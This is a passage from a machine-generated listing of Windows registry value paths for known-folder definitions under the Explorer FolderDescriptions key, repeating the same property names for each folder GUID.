HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0F214138-B1D3-4A90-BBA9-27CBC0C5389A}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0F214138-B1D3-4A90-BBA9-27CBC0C5389A}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0F214138-B1D3-4A90-BBA9-27CBC0C5389A}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0F214138-B1D3-4A90-BBA9-27CBC0C5389A}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0F214138-B1D3-4A90-BBA9-27CBC0C5389A}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0F214138-B1D3-4A90-BBA9-27CBC0C5389A}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2400183A-6185-49FB-A2D8-4A392A602BA3}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2400183A-6185-49FB-A2D8-4A392A602BA3}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2400183A-6185-49FB-A2D8-4A392A602BA3}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2400183A-6185-49FB-A2D8-4A392A602BA3}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2400183A-6185-49FB-A2D8-4A392A602BA3}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2400183A-6185-49FB-A2D8-4A392A602BA3}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2400183A-6185-49FB-A2D8-4A392A602BA3}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2400183A-6185-49FB-A2D8-4A392A602BA3}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2400183A-6185-49FB-A2D8-4A392A602BA3}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2400183A-6185-49FB-A2D8-4A392A602BA3}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2400183A-6185-49FB-A2D8-4A392A602BA3}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2400183A-6185-49FB-A2D8-4A392A602BA3}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2400183A-6185-49FB-A2D8-4A392A602BA3}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2400183A-6185-49FB-A2D8-4A392A602BA3}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2400183A-6185-49FB-A2D8-4A392A602BA3}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2400183A-6185-49FB-A2D8-4A392A602BA3}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2400183A-6185-49FB-A2D8-4A392A602BA3}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2400183A-6185-49FB-A2D8-4A392A602BA3}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2400183A-6185-49FB-A2D8-4A392A602BA3}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2400183A-6185-49FB-A2D8-4A392A602BA3}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{D9DC8A3B-B784-432E-A781-5A1130A75963}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{D9DC8A3B-B784-432E-A781-5A1130A75963}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{D9DC8A3B-B784-432E-A781-5A1130A75963}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{D9DC8A3B-B784-432E-A781-5A1130A75963}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{D9DC8A3B-B784-432E-A781-5A1130A75963}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{D9DC8A3B-B784-432E-A781-5A1130A75963}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{D9DC8A3B-B784-432E-A781-5A1130A75963}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{D9DC8A3B-B784-432E-A781-5A1130A75963}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{D9DC8A3B-B784-432E-A781-5A1130A75963}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{D9DC8A3B-B784-432E-A781-5A1130A75963}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{D9DC8A3B-B784-432E-A781-5A1130A75963}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{D9DC8A3B-B784-432E-A781-5A1130A75963}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{D9DC8A3B-B784-432E-A781-5A1130A75963}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{D9DC8A3B-B784-432E-A781-5A1130A75963}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{D9DC8A3B-B784-432E-A781-5A1130A75963}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{D9DC8A3B-B784-432E-A781-5A1130A75963}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{D9DC8A3B-B784-432E-A781-5A1130A75963}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{D9DC8A3B-B784-432E-A781-5A1130A75963}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{D9DC8A3B-B784-432E-A781-5A1130A75963}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{D9DC8A3B-B784-432E-A781-5A1130A75963}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4900540-2379-4C75-844B-64E6FAF8716B}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4900540-2379-4C75-844B-64E6FAF8716B}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4900540-2379-4C75-844B-64E6FAF8716B}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4900540-2379-4C75-844B-64E6FAF8716B}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4900540-2379-4C75-844B-64E6FAF8716B}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4900540-2379-4C75-844B-64E6FAF8716B}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4900540-2379-4C75-844B-64E6FAF8716B}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4900540-2379-4C75-844B-64E6FAF8716B}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4900540-2379-4C75-844B-64E6FAF8716B}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4900540-2379-4C75-844B-64E6FAF8716B}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4900540-2379-4C75-844B-64E6FAF8716B}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4900540-2379-4C75-844B-64E6FAF8716B}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4900540-2379-4C75-844B-64E6FAF8716B}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4900540-2379-4C75-844B-64E6FAF8716B}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4900540-2379-4C75-844B-64E6FAF8716B}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4900540-2379-4C75-844B-64E6FAF8716B}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4900540-2379-4C75-844B-64E6FAF8716B}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4900540-2379-4C75-844B-64E6FAF8716B}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4900540-2379-4C75-844B-64E6FAF8716B}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4900540-2379-4C75-844B-64E6FAF8716B}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{289A9A43-BE44-4057-A41B-587A76D7E7F9}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{289A9A43-BE44-4057-A41B-587A76D7E7F9}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{289A9A43-BE44-4057-A41B-587A76D7E7F9}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{289A9A43-BE44-4057-A41B-587A76D7E7F9}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{289A9A43-BE44-4057-A41B-587A76D7E7F9}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{289A9A43-BE44-4057-A41B-587A76D7E7F9}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{289A9A43-BE44-4057-A41B-587A76D7E7F9}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{289A9A43-BE44-4057-A41B-587A76D7E7F9}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{289A9A43-BE44-4057-A41B-587A76D7E7F9}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{289A9A43-BE44-4057-A41B-587A76D7E7F9}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{289A9A43-BE44-4057-A41B-587A76D7E7F9}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{289A9A43-BE44-4057-A41B-587A76D7E7F9}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{289A9A43-BE44-4057-A41B-587A76D7E7F9}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{289A9A43-BE44-4057-A41B-587A76D7E7F9}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{289A9A43-BE44-4057-A41B-587A76D7E7F9}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{289A9A43-BE44-4057-A41B-587A76D7E7F9}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{289A9A43-BE44-4057-A41B-587A76D7E7F9}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{289A9A43-BE44-4057-A41B-587A76D7E7F9}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{289A9A43-BE44-4057-A41B-587A76D7E7F9}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{289A9A43-BE44-4057-A41B-587A76D7E7F9}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BFEFB45-347D-4006-A5BE-AC0CB0567192}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BFEFB45-347D-4006-A5BE-AC0CB0567192}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BFEFB45-347D-4006-A5BE-AC0CB0567192}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BFEFB45-347D-4006-A5BE-AC0CB0567192}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BFEFB45-347D-4006-A5BE-AC0CB0567192}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BFEFB45-347D-4006-A5BE-AC0CB0567192}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BFEFB45-347D-4006-A5BE-AC0CB0567192}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BFEFB45-347D-4006-A5BE-AC0CB0567192}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BFEFB45-347D-4006-A5BE-AC0CB0567192}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BFEFB45-347D-4006-A5BE-AC0CB0567192}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BFEFB45-347D-4006-A5BE-AC0CB0567192}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BFEFB45-347D-4006-A5BE-AC0CB0567192}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BFEFB45-347D-4006-A5BE-AC0CB0567192}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BFEFB45-347D-4006-A5BE-AC0CB0567192}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BFEFB45-347D-4006-A5BE-AC0CB0567192}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BFEFB45-347D-4006-A5BE-AC0CB0567192}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BFEFB45-347D-4006-A5BE-AC0CB0567192}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BFEFB45-347D-4006-A5BE-AC0CB0567192}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BFEFB45-347D-4006-A5BE-AC0CB0567192}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BFEFB45-347D-4006-A5BE-AC0CB0567192}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B7534046-3ECB-4C18-BE4E-64CD4CB7D6AC}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B7534046-3ECB-4C18-BE4E-64CD4CB7D6AC}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B7534046-3ECB-4C18-BE4E-64CD4CB7D6AC}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B7534046-3ECB-4C18-BE4E-64CD4CB7D6AC}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B7534046-3ECB-4C18-BE4E-64CD4CB7D6AC}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B7534046-3ECB-4C18-BE4E-64CD4CB7D6AC}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B7534046-3ECB-4C18-BE4E-64CD4CB7D6AC}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B7534046-3ECB-4C18-BE4E-64CD4CB7D6AC}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B7534046-3ECB-4C18-BE4E-64CD4CB7D6AC}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B7534046-3ECB-4C18-BE4E-64CD4CB7D6AC}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B7534046-3ECB-4C18-BE4E-64CD4CB7D6AC}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B7534046-3ECB-4C18-BE4E-64CD4CB7D6AC}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B7534046-3ECB-4C18-BE4E-64CD4CB7D6AC}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B7534046-3ECB-4C18-BE4E-64CD4CB7D6AC}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B7534046-3ECB-4C18-BE4E-64CD4CB7D6AC}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B7534046-3ECB-4C18-BE4E-64CD4CB7D6AC}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B7534046-3ECB-4C18-BE4E-64CD4CB7D6AC}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B7534046-3ECB-4C18-BE4E-64CD4CB7D6AC}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B7534046-3ECB-4C18-BE4E-64CD4CB7D6AC}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B7534046-3ECB-4C18-BE4E-64CD4CB7D6AC}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{EE32E446-31CA-4ABA-814F-A5EBD2FD6D5E}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{EE32E446-31CA-4ABA-814F-A5EBD2FD6D5E}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{EE32E446-31CA-4ABA-814F-A5EBD2FD6D5E}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{EE32E446-31CA-4ABA-814F-A5EBD2FD6D5E}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{EE32E446-31CA-4ABA-814F-A5EBD2FD6D5E}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{EE32E446-31CA-4ABA-814F-A5EBD2FD6D5E}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{EE32E446-31CA-4ABA-814F-A5EBD2FD6D5E}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{EE32E446-31CA-4ABA-814F-A5EBD2FD6D5E}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{EE32E446-31CA-4ABA-814F-A5EBD2FD6D5E}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{EE32E446-31CA-4ABA-814F-A5EBD2FD6D5E}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{EE32E446-31CA-4ABA-814F-A5EBD2FD6D5E}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{EE32E446-31CA-4ABA-814F-A5EBD2FD6D5E}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{EE32E446-31CA-4ABA-814F-A5EBD2FD6D5E}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{EE32E446-31CA-4ABA-814F-A5EBD2FD6D5E}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{EE32E446-31CA-4ABA-814F-A5EBD2FD6D5E}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{EE32E446-31CA-4ABA-814F-A5EBD2FD6D5E}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{EE32E446-31CA-4ABA-814F-A5EBD2FD6D5E}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{EE32E446-31CA-4ABA-814F-A5EBD2FD6D5E}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{EE32E446-31CA-4ABA-814F-A5EBD2FD6D5E}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{EE32E446-31CA-4ABA-814F-A5EBD2FD6D5E}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C870044B-F49E-4126-A9C3-B52A1FF411E8}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C870044B-F49E-4126-A9C3-B52A1FF411E8}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C870044B-F49E-4126-A9C3-B52A1FF411E8}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C870044B-F49E-4126-A9C3-B52A1FF411E8}\Description
